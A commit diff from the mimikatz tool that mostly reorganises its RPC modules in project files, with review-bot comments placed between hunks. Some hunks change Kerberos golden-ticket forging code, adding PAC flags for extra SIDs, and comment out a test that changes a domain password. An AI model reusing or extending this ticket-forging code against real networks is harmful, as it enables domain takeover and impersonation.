[internal] modules RPC directory & cleaning

This commit is contained in:
Benjamin DELPY 2016-07-19 17:48:55 +02:00
parent dc78942618
commit 4ed563f925
29 changed files with 6915 additions and 397 deletions


@ -70,6 +70,8 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define RtlEqualGuid(L1, L2) (RtlEqualMemory(L1, L2, sizeof(GUID)))
#define SIZE_ALIGN(size, alignment) (size + ((size % alignment) ? (alignment - (size % alignment)) : 0))
#define LM_NTLM_HASH_LENGTH 16
#define KULL_M_WIN_BUILD_XP 2600
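Review bot: SIZE_ALIGN two lines up does not parenthesize its arguments, so an expression argument such as `a + b` expands to `a + b % alignment` and yields a wrong size, and `size` is evaluated up to three times. The rendered page does not show which two of these four lines are the additions, but SIZE_ALIGN is what the new kuhl_m_pac.c code calls, so it is worth hardening here: `#define SIZE_ALIGN(size, alignment) ((size) + (((size) % (alignment)) ? ((alignment) - ((size) % (alignment))) : 0))`. Existing callers that pass a plain variable are unaffected.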


@ -106,12 +106,13 @@
<ClCompile Include="..\modules\kull_m_process.c" />
<ClCompile Include="..\modules\kull_m_registry.c" />
<ClCompile Include="..\modules\kull_m_remotelib.c" />
<ClCompile Include="..\modules\kull_m_rpc.c" />
<ClCompile Include="..\modules\kull_m_rpc_bkrp.c" />
<ClCompile Include="..\modules\kull_m_rpc_drsr.c" />
<ClCompile Include="..\modules\kull_m_rpc_ms-bkrp_c.c" />
<ClCompile Include="..\modules\kull_m_rpc_ms-drsr_c.c" />
<ClCompile Include="..\modules\kull_m_rpc_ms-pac.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_bkrp.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_drsr.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-bkrp_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-drsr_c.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-pac.c" />
<ClCompile Include="..\modules\rpc\kull_m_rpc_pac.c" />
<ClCompile Include="..\modules\kull_m_service.c" />
<ClCompile Include="..\modules\kull_m_string.c" />
<ClCompile Include="..\modules\kull_m_token.c" />
@ -187,14 +188,14 @@
<ClInclude Include="..\modules\kull_m_registry.h" />
<ClInclude Include="..\modules\kull_m_registry_structures.h" />
<ClInclude Include="..\modules\kull_m_remotelib.h" />
<ClInclude Include="..\modules\kull_m_rpc.h" />
<ClInclude Include="..\modules\kull_m_rpce.h" />
<ClInclude Include="..\modules\kull_m_rpc_bkrp.h" />
<ClInclude Include="..\modules\kull_m_rpc_drsr.h" />
<ClInclude Include="..\modules\kull_m_rpc_ms-drsr.h" />
<ClInclude Include="..\modules\kull_m_rpc_ms-dtyp.h" />
<ClInclude Include="..\modules\kull_m_rpc_ms-bkrp.h" />
<ClInclude Include="..\modules\kull_m_rpc_ms-pac.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_bkrp.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_drsr.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-drsr.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-dtyp.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-bkrp.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-pac.h" />
<ClInclude Include="..\modules\rpc\kull_m_rpc_pac.h" />
<ClInclude Include="..\modules\kull_m_samlib.h" />
<ClInclude Include="..\modules\kull_m_service.h" />
<ClInclude Include="..\modules\kull_m_string.h" />


@ -170,12 +170,6 @@
<ClCompile Include="..\modules\kull_m_cred.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc_ms-drsr_c.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc_drsr.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_busylight.c">
<Filter>common modules</Filter>
</ClCompile>
@ -197,23 +191,32 @@
<ClCompile Include="..\modules\sqlite3_omit.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc_ms-bkrp_c.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc_bkrp.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_xml.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="modules\kuhl_m_iis.c">
<Filter>local modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_rpc_ms-pac.c">
<Filter>common modules</Filter>
<ClCompile Include="..\modules\rpc\kull_m_rpc.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_bkrp.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_drsr.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-bkrp_c.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-drsr_c.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-pac.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
<ClCompile Include="..\modules\rpc\kull_m_rpc_pac.c">
<Filter>common modules\rpc</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
@ -356,9 +359,6 @@
<ClInclude Include="modules\kuhl_m_vault.h">
<Filter>local modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpce.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_samlib.h">
<Filter>common modules</Filter>
</ClInclude>
@ -404,15 +404,6 @@
<ClInclude Include="..\modules\kull_m_cred.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_ms-drsr.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_ms-dtyp.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_drsr.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_busylight.h">
<Filter>common modules</Filter>
</ClInclude>
@ -437,23 +428,35 @@
<ClInclude Include="..\modules\sqlite3_omit.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_ms-bkrp.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_bkrp.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_xml.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="modules\kuhl_m_iis.h">
<Filter>local modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_rpc_ms-pac.h">
<Filter>common modules</Filter>
<ClInclude Include="..\modules\rpc\kull_m_rpc.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_bkrp.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_drsr.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-bkrp.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-drsr.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-dtyp.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-pac.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
<ClInclude Include="..\modules\rpc\kull_m_rpc_pac.h">
<Filter>common modules\rpc</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
@ -483,6 +486,9 @@
<Filter Include="local modules\dpapi\packages">
<UniqueIdentifier>{0068506b-99c4-4d30-936a-d54598f49425}</UniqueIdentifier>
</Filter>
<Filter Include="common modules\rpc">
<UniqueIdentifier>{36857c96-00a6-4cb6-8ca9-591d0561662c}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="mimikatz.rc" />


@ -19,7 +19,6 @@ const KUHL_M_C kuhl_m_c_kerberos[] = {
{kuhl_m_kerberos_golden, L"golden", L"Willy Wonka factory"},
{kuhl_m_kerberos_hash, L"hash", L"Hash password to keys"},
#ifdef KERBEROS_TOOLS
{kuhl_m_kerberos_test, L"test", L"test"},
{kuhl_m_kerberos_decode, L"decrypt", L"Decrypt encoded ticket"},
{kuhl_m_kerberos_pac_info, L"pacinfo", L"Some infos on PAC file"},
#endif
@ -710,8 +709,14 @@ PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWST
validationInfo.SidCount = cbSids;
validationInfo.ExtraSids = sids;
if(cbSids && sids)
validationInfo.ResourceGroupDomainSid = NULL;
validationInfo.ResourceGroupCount = 0;
validationInfo.ResourceGroupIds = NULL;
if(validationInfo.ExtraSids && validationInfo.SidCount)
validationInfo.UserFlags |= 0x20;
if(validationInfo.ResourceGroupDomainSid && validationInfo.ResourceGroupIds && validationInfo.ResourceGroupCount)
validationInfo.UserFlags |= 0x200;
switch(keyType)
{
@ -903,103 +908,103 @@ NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kerberos_test(int argc, wchar_t * argv[])
{
NTSTATUS status, packageStatus;
KERB_CHANGEPASSWORD_REQUEST kerbChangePasswordRequest;
PBYTE kerbChangePasswordRequestBuffer;
DWORD size, responseSize = 1024, offset = sizeof(KERB_CHANGEPASSWORD_REQUEST);
BYTE dumPtr[1024];
RtlZeroMemory(&kerbChangePasswordRequest, sizeof(KERB_CHANGEPASSWORD_REQUEST));
kerbChangePasswordRequest.MessageType = KerbChangePasswordMessage;
RtlInitUnicodeString(&kerbChangePasswordRequest.DomainName, L"chocolate.local");
RtlInitUnicodeString(&kerbChangePasswordRequest.AccountName, L"testme");
RtlInitUnicodeString(&kerbChangePasswordRequest.OldPassword, L"---");
RtlInitUnicodeString(&kerbChangePasswordRequest.NewPassword, L"t4waza1234/");
kerbChangePasswordRequest.Impersonating = FALSE;
size = kerbChangePasswordRequest.DomainName.Length + kerbChangePasswordRequest.AccountName.Length + kerbChangePasswordRequest.OldPassword.Length + kerbChangePasswordRequest.NewPassword.Length;
if(kerbChangePasswordRequestBuffer = (PBYTE) LocalAlloc(LPTR, offset + size))
{
RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.DomainName.Buffer, kerbChangePasswordRequest.DomainName.Length);
kerbChangePasswordRequest.DomainName.Buffer = (PWCHAR) offset;
offset += kerbChangePasswordRequest.DomainName.Length;
RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.AccountName.Buffer, kerbChangePasswordRequest.AccountName.Length);
kerbChangePasswordRequest.AccountName.Buffer = (PWCHAR) offset;
offset += kerbChangePasswordRequest.AccountName.Length;
RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.OldPassword.Buffer, kerbChangePasswordRequest.OldPassword.Length);
kerbChangePasswordRequest.OldPassword.Buffer = (PWCHAR) offset;
offset += kerbChangePasswordRequest.OldPassword.Length;
RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.NewPassword.Buffer, kerbChangePasswordRequest.NewPassword.Length);
kerbChangePasswordRequest.NewPassword.Buffer = (PWCHAR) offset;
offset += kerbChangePasswordRequest.NewPassword.Length;
RtlCopyMemory(kerbChangePasswordRequestBuffer, &kerbChangePasswordRequest, sizeof(KERB_CHANGEPASSWORD_REQUEST));
status = LsaCallKerberosPackage(kerbChangePasswordRequestBuffer, sizeof(KERB_CHANGEPASSWORD_REQUEST) + size, (PVOID *)&dumPtr, &responseSize, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
kprintf(L"KerbChangePasswordMessage is OK\n");
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbChangePasswordMessage / Package : %08x\n", packageStatus);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbChangePasswordMessage : %08x\n", status);
LocalFree(kerbChangePasswordRequestBuffer);
}
/*
KERB_SETPASSWORD_REQUEST kerbSetPasswordRequest;
PBYTE kerbSetPasswordRequestBuffer;
DWORD size, responseSize = 1024, offset = sizeof(KERB_SETPASSWORD_REQUEST);
BYTE dumPtr[1024];
RtlZeroMemory(&kerbSetPasswordRequest, sizeof(KERB_SETPASSWORD_REQUEST));
kerbSetPasswordRequest.MessageType = KerbSetPasswordMessage;
RtlInitUnicodeString(&kerbSetPasswordRequest.DomainName, L"chocolate.local");
RtlInitUnicodeString(&kerbSetPasswordRequest.AccountName, L"testme");
RtlInitUnicodeString(&kerbSetPasswordRequest.Password, L"t2waza1234/");
size = kerbSetPasswordRequest.DomainName.Length + kerbSetPasswordRequest.AccountName.Length + kerbSetPasswordRequest.Password.Length;
if(kerbSetPasswordRequestBuffer = (PBYTE) LocalAlloc(LPTR, offset + size))
{
RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.DomainName.Buffer, kerbSetPasswordRequest.DomainName.Length);
kerbSetPasswordRequest.DomainName.Buffer = (PWCHAR) offset;
offset += kerbSetPasswordRequest.DomainName.Length;
RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.AccountName.Buffer, kerbSetPasswordRequest.AccountName.Length);
kerbSetPasswordRequest.AccountName.Buffer = (PWCHAR) offset;
offset += kerbSetPasswordRequest.AccountName.Length;
RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.Password.Buffer, kerbSetPasswordRequest.Password.Length);
kerbSetPasswordRequest.Password.Buffer = (PWCHAR) offset;
offset += kerbSetPasswordRequest.Password.Length;
RtlCopyMemory(kerbSetPasswordRequestBuffer, &kerbSetPasswordRequest, sizeof(KERB_SETPASSWORD_REQUEST));
status = LsaCallKerberosPackage(kerbSetPasswordRequestBuffer, sizeof(KERB_SETPASSWORD_REQUEST) + size, (PVOID *)&dumPtr, &responseSize, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
kprintf(L"kerbSetPasswordRequest is OK\n");
else PRINT_ERROR(L"LsaCallAuthenticationPackage kerbSetPasswordRequest / Package : %08x\n", packageStatus);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage kerbSetPasswordRequest : %08x\n", status);
LocalFree(kerbSetPasswordRequestBuffer);
}
*/
return STATUS_SUCCESS;
}
//NTSTATUS kuhl_m_kerberos_test(int argc, wchar_t * argv[])
//{
// NTSTATUS status, packageStatus;
//
// KERB_CHANGEPASSWORD_REQUEST kerbChangePasswordRequest;
// PBYTE kerbChangePasswordRequestBuffer;
//
// DWORD size, responseSize = 1024, offset = sizeof(KERB_CHANGEPASSWORD_REQUEST);
// BYTE dumPtr[1024];
//
// RtlZeroMemory(&kerbChangePasswordRequest, sizeof(KERB_CHANGEPASSWORD_REQUEST));
//
// kerbChangePasswordRequest.MessageType = KerbChangePasswordMessage;
// RtlInitUnicodeString(&kerbChangePasswordRequest.DomainName, L"chocolate.local");
// RtlInitUnicodeString(&kerbChangePasswordRequest.AccountName, L"testme");
// RtlInitUnicodeString(&kerbChangePasswordRequest.OldPassword, L"---");
// RtlInitUnicodeString(&kerbChangePasswordRequest.NewPassword, L"t4waza1234/");
// kerbChangePasswordRequest.Impersonating = FALSE;
//
// size = kerbChangePasswordRequest.DomainName.Length + kerbChangePasswordRequest.AccountName.Length + kerbChangePasswordRequest.OldPassword.Length + kerbChangePasswordRequest.NewPassword.Length;
// if(kerbChangePasswordRequestBuffer = (PBYTE) LocalAlloc(LPTR, offset + size))
// {
// RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.DomainName.Buffer, kerbChangePasswordRequest.DomainName.Length);
// kerbChangePasswordRequest.DomainName.Buffer = (PWCHAR) offset;
// offset += kerbChangePasswordRequest.DomainName.Length;
//
// RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.AccountName.Buffer, kerbChangePasswordRequest.AccountName.Length);
// kerbChangePasswordRequest.AccountName.Buffer = (PWCHAR) offset;
// offset += kerbChangePasswordRequest.AccountName.Length;
//
// RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.OldPassword.Buffer, kerbChangePasswordRequest.OldPassword.Length);
// kerbChangePasswordRequest.OldPassword.Buffer = (PWCHAR) offset;
// offset += kerbChangePasswordRequest.OldPassword.Length;
//
// RtlCopyMemory(kerbChangePasswordRequestBuffer + offset, kerbChangePasswordRequest.NewPassword.Buffer, kerbChangePasswordRequest.NewPassword.Length);
// kerbChangePasswordRequest.NewPassword.Buffer = (PWCHAR) offset;
// offset += kerbChangePasswordRequest.NewPassword.Length;
//
//
// RtlCopyMemory(kerbChangePasswordRequestBuffer, &kerbChangePasswordRequest, sizeof(KERB_CHANGEPASSWORD_REQUEST));
//
// status = LsaCallKerberosPackage(kerbChangePasswordRequestBuffer, sizeof(KERB_CHANGEPASSWORD_REQUEST) + size, (PVOID *)&dumPtr, &responseSize, &packageStatus);
// if(NT_SUCCESS(status))
// {
// if(NT_SUCCESS(packageStatus))
// kprintf(L"KerbChangePasswordMessage is OK\n");
// else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbChangePasswordMessage / Package : %08x\n", packageStatus);
// }
// else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbChangePasswordMessage : %08x\n", status);
//
// LocalFree(kerbChangePasswordRequestBuffer);
// }
//
///*
// KERB_SETPASSWORD_REQUEST kerbSetPasswordRequest;
// PBYTE kerbSetPasswordRequestBuffer;
//
// DWORD size, responseSize = 1024, offset = sizeof(KERB_SETPASSWORD_REQUEST);
// BYTE dumPtr[1024];
//
// RtlZeroMemory(&kerbSetPasswordRequest, sizeof(KERB_SETPASSWORD_REQUEST));
// kerbSetPasswordRequest.MessageType = KerbSetPasswordMessage;
// RtlInitUnicodeString(&kerbSetPasswordRequest.DomainName, L"chocolate.local");
// RtlInitUnicodeString(&kerbSetPasswordRequest.AccountName, L"testme");
// RtlInitUnicodeString(&kerbSetPasswordRequest.Password, L"t2waza1234/");
//
//
// size = kerbSetPasswordRequest.DomainName.Length + kerbSetPasswordRequest.AccountName.Length + kerbSetPasswordRequest.Password.Length;
// if(kerbSetPasswordRequestBuffer = (PBYTE) LocalAlloc(LPTR, offset + size))
// {
// RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.DomainName.Buffer, kerbSetPasswordRequest.DomainName.Length);
// kerbSetPasswordRequest.DomainName.Buffer = (PWCHAR) offset;
// offset += kerbSetPasswordRequest.DomainName.Length;
//
// RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.AccountName.Buffer, kerbSetPasswordRequest.AccountName.Length);
// kerbSetPasswordRequest.AccountName.Buffer = (PWCHAR) offset;
// offset += kerbSetPasswordRequest.AccountName.Length;
//
// RtlCopyMemory(kerbSetPasswordRequestBuffer + offset, kerbSetPasswordRequest.Password.Buffer, kerbSetPasswordRequest.Password.Length);
// kerbSetPasswordRequest.Password.Buffer = (PWCHAR) offset;
// offset += kerbSetPasswordRequest.Password.Length;
//
// RtlCopyMemory(kerbSetPasswordRequestBuffer, &kerbSetPasswordRequest, sizeof(KERB_SETPASSWORD_REQUEST));
//
// status = LsaCallKerberosPackage(kerbSetPasswordRequestBuffer, sizeof(KERB_SETPASSWORD_REQUEST) + size, (PVOID *)&dumPtr, &responseSize, &packageStatus);
// if(NT_SUCCESS(status))
// {
// if(NT_SUCCESS(packageStatus))
// kprintf(L"kerbSetPasswordRequest is OK\n");
// else PRINT_ERROR(L"LsaCallAuthenticationPackage kerbSetPasswordRequest / Package : %08x\n", packageStatus);
// }
// else PRINT_ERROR(L"LsaCallAuthenticationPackage kerbSetPasswordRequest : %08x\n", status);
//
// LocalFree(kerbSetPasswordRequestBuffer);
// }
// */
//
// return STATUS_SUCCESS;
//}
#endif
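Review bot: In the -710,8 +709,14 hunk of kuhl_m_kerberos_golden_data (the function starts and ends outside the hunk) the `validationInfo.UserFlags |= 0x200;` branch is unreachable: ResourceGroupDomainSid, ResourceGroupIds and ResourceGroupCount are set to NULL/0 three lines earlier, so its guard is always false. If this is a placeholder for a future parameter a comment saying so would help; otherwise the two lines should go. The two flag values would also read better as named constants than as repeated literals, e.g. (suggested names) `#define PAC_USERFLAG_EXTRA_SIDS 0x20` and `#define PAC_USERFLAG_RESOURCE_GROUPS 0x200`, matching the MS-PAC UserFlags bits they stand for. The third hunk keeps kuhl_m_kerberos_test as roughly a hundred commented-out lines although its prototype and command-table entry are removed in the same commit; deleting the body outright is cleaner, since version control keeps the history.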


@ -43,7 +43,6 @@ NTSTATUS kuhl_m_kerberos_tgt(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_kerberos_purge(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_kerberos_hash(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_kerberos_test(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_kerberos_hash_data(LONG keyType, PCUNICODE_STRING pString, PCUNICODE_STRING pSalt, DWORD count);
wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICKET_CACHE_INFO_EX ticket, LPCWSTR ext);


@ -9,34 +9,20 @@ BOOL kuhl_m_pac_validationInfo_to_PAC(PKERB_VALIDATION_INFO validationInfo, DWOR
{
BOOL status = FALSE;
PVOID pLogonInfo = NULL;
DWORD szLogonInfo = 0, szLogonInfoAligned = 0;
PPAC_CLIENT_INFO pClientInfo = NULL;
DWORD szClientInfo = 0, szClientInfoAligned = 0;
PAC_SIGNATURE_DATA signature = {SignatureType, {0}};//, {0}, 0, 0};
DWORD szSignature = FIELD_OFFSET(PAC_SIGNATURE_DATA, Signature), szSignatureAligned;//sizeof(PAC_SIGNATURE_DATA) - 2 * sizeof(USHORT), szSignatureAligned;
DWORD modulo, offsetData = sizeof(PACTYPE) + 3 * sizeof(PAC_INFO_BUFFER);
PAC_SIGNATURE_DATA signature = {SignatureType, {0}};
DWORD szLogonInfo = 0, szLogonInfoAligned, szClientInfo = 0, szClientInfoAligned, szSignature = FIELD_OFFSET(PAC_SIGNATURE_DATA, Signature), szSignatureAligned, offsetData = sizeof(PACTYPE) + 3 * sizeof(PAC_INFO_BUFFER);
PKERB_CHECKSUM pCheckSum;
if(NT_SUCCESS(CDLocateCheckSum(SignatureType, &pCheckSum)))
{
if(kuhl_m_pac_validationInfo_to_LOGON_INFO(validationInfo, &pLogonInfo, &szLogonInfo))
{
szLogonInfoAligned = szLogonInfo;
if(modulo = szLogonInfo % 8)
szLogonInfoAligned += 8 - modulo;
}
if(kuhl_m_pac_validationInfo_to_CNAME_TINFO(validationInfo, &pClientInfo, &szClientInfo))
{
szClientInfoAligned = szClientInfo;
if(modulo = szClientInfo % 8)
szClientInfoAligned += (8 - modulo);
}
szSignature += pCheckSum->Size;
szSignatureAligned = SIZE_ALIGN(szSignature, 8);
szSignatureAligned = szSignature;
if(modulo = szSignature % 8)
szSignatureAligned += 8 - modulo;
if(kuhl_m_pac_EncodeValidationInformation(validationInfo, &pLogonInfo, &szLogonInfo))
szLogonInfoAligned = SIZE_ALIGN(szLogonInfo, 8);
if(kuhl_m_pac_validationInfo_to_CNAME_TINFO(validationInfo, &pClientInfo, &szClientInfo))
szClientInfoAligned = SIZE_ALIGN(szClientInfo, 8);
if(pLogonInfo && pClientInfo)
{
@ -80,7 +66,7 @@ BOOL kuhl_m_pac_validationInfo_to_PAC(PKERB_VALIDATION_INFO validationInfo, DWOR
NTSTATUS kuhl_m_pac_signature(PPACTYPE pacType, DWORD pacLenght, DWORD SignatureType, LPCVOID key, DWORD keySize)
{
NTSTATUS status = STATUS_NOT_FOUND;
NTSTATUS status;
DWORD i;
PKERB_CHECKSUM pCheckSum;
PVOID Context;
@ -90,6 +76,7 @@ NTSTATUS kuhl_m_pac_signature(PPACTYPE pacType, DWORD pacLenght, DWORD Signature
status = CDLocateCheckSum(SignatureType, &pCheckSum);
if(NT_SUCCESS(status))
{
status = STATUS_NOT_FOUND;
for(i = 0; i < pacType->cBuffers; i++)
{
if((pacType->Buffers[i].ulType == PACINFO_TYPE_CHECKSUM_SRV) || (pacType->Buffers[i].ulType == PACINFO_TYPE_CHECKSUM_KDC))
@ -123,38 +110,6 @@ NTSTATUS kuhl_m_pac_signature(PPACTYPE pacType, DWORD pacLenght, DWORD Signature
return status;
}
BOOL kuhl_m_pac_validationInfo_to_LOGON_INFO(PKERB_VALIDATION_INFO validationInfo, PVOID *rpceValidationInfo, DWORD *rpceValidationInfoLength)
{
BOOL status = FALSE;
RPC_STATUS rpcStatus;
KULL_M_RPC_FCNSTRUCT UserState;
handle_t pHandle;
rpcStatus = MesEncodeIncrementalHandleCreate(&UserState, ReadFcn, WriteFcn, &pHandle);
if(NT_SUCCESS(rpcStatus))
{
*rpceValidationInfoLength = (DWORD) PKERB_VALIDATION_INFO_AlignSize(pHandle, &validationInfo);
if(*rpceValidationInfo = LocalAlloc(LPTR, *rpceValidationInfoLength))
{
rpcStatus = MesIncrementalHandleReset(pHandle, NULL, NULL, NULL, NULL, MES_ENCODE);
if(NT_SUCCESS(rpcStatus))
{
UserState.addr = *rpceValidationInfo;
UserState.size = *rpceValidationInfoLength;
PKERB_VALIDATION_INFO_Encode(pHandle, &validationInfo);
status = TRUE;
}
else PRINT_ERROR(L"MesIncrementalHandleReset: %08x\n", rpcStatus);
if(!status)
*rpceValidationInfo = LocalFree(*rpceValidationInfo);
}
MesHandleFree(pHandle);
}
else PRINT_ERROR(L"MesEncodeIncrementalHandleCreate: %08x\n", rpcStatus);
return status;
}
BOOL kuhl_m_pac_validationInfo_to_CNAME_TINFO(PKERB_VALIDATION_INFO validationInfo, PPAC_CLIENT_INFO * pacClientInfo, DWORD * pacClientInfoLength)
{
BOOL status = FALSE;
@ -170,90 +125,15 @@ BOOL kuhl_m_pac_validationInfo_to_CNAME_TINFO(PKERB_VALIDATION_INFO validationIn
}
#ifdef KERBEROS_TOOLS
const RPCE_LAZY_ELEMENT_HEADER kuhl_m_kerberos_pac_headers[] = {
//{0x00020000, sizeof(KERB_VALIDATION_INFO), 0, FALSE},
{PACINFO_ID_KERB_EFFECTIVENAME, sizeof(WCHAR), 0, TRUE}, // EffectiveName
{PACINFO_ID_KERB_FULLNAME, sizeof(WCHAR), 0, TRUE}, // FullName
{PACINFO_ID_KERB_LOGONSCRIPT, sizeof(WCHAR), 0, TRUE}, // LogonScript
{PACINFO_ID_KERB_PROFILEPATH, sizeof(WCHAR), 0, TRUE}, // ProfilePath
{PACINFO_ID_KERB_HOMEDIRECTORY, sizeof(WCHAR), 0, TRUE}, // HomeDirectory
{PACINFO_ID_KERB_HOMEDIRECTORYDRIVE, sizeof(WCHAR), 0, TRUE}, // HomeDirectoryDrive
{PACINFO_ID_KERB_GROUPIDS, sizeof(GROUP_MEMBERSHIP), 0, FALSE}, // GroupIds
{PACINFO_ID_KERB_LOGONSERVER, sizeof(WCHAR), 0, TRUE}, // LogonServer
{PACINFO_ID_KERB_LOGONDOMAINNAME, sizeof(WCHAR), 0, TRUE}, // LogonDomainName
{PACINFO_ID_KERB_LOGONDOMAINID, sizeof(DWORD), 8, FALSE}, // LogonDomainId
{PACINFO_ID_KERB_EXTRASIDS, sizeof(DWORD)+sizeof(RPCEID), 0, FALSE},
{PACINFO_ID_KERB_EXTRASID, sizeof(DWORD), 8, FALSE},
{PACINFO_ID_KERB_RESGROUPDOMAINSID, sizeof(DWORD), 8, FALSE},
{PACINFO_ID_KERB_RESGROUPIDS, sizeof(GROUP_MEMBERSHIP), 0, FALSE},
// ... Lazy ;)
};
PVOID kuhl_m_kerberos_pac_giveElementById(RPCEID id, LPCVOID base)
{
DWORD i, modulo;
PBYTE start = (PBYTE) base;
ULONG64 dataOffset, nextOffset;
if(id)
{
for(i = 0; i < ARRAYSIZE(kuhl_m_kerberos_pac_headers); i++)
{
if(kuhl_m_kerberos_pac_headers[i].isBuffer)
{
dataOffset = sizeof(ULONG64) + sizeof(ULONG32);
nextOffset = *((PULONG32) (start + sizeof(ULONG64))) * kuhl_m_kerberos_pac_headers[i].ElementSize;
/*/kprintf(L"Buffer\t%016llx %08x -- ", *(PULONG64) start, *(PULONG32) (start + 8));
kull_m_string_wprintf_hex(start + dataOffset, (DWORD) nextOffset, 1);
kprintf(L"\n");*/
}
else
{
dataOffset = sizeof(ULONG32);
nextOffset = *((PULONG32) start) * kuhl_m_kerberos_pac_headers[i].ElementSize;
/*kprintf(L"%u, %u\n", *((PULONG32) start), *((PULONG32) start) * kuhl_m_kerberos_pac_headers[i].ElementSize);
kprintf(L"Data\t %08x -- ", *(PULONG64) start, *(PULONG32) (start + 4));
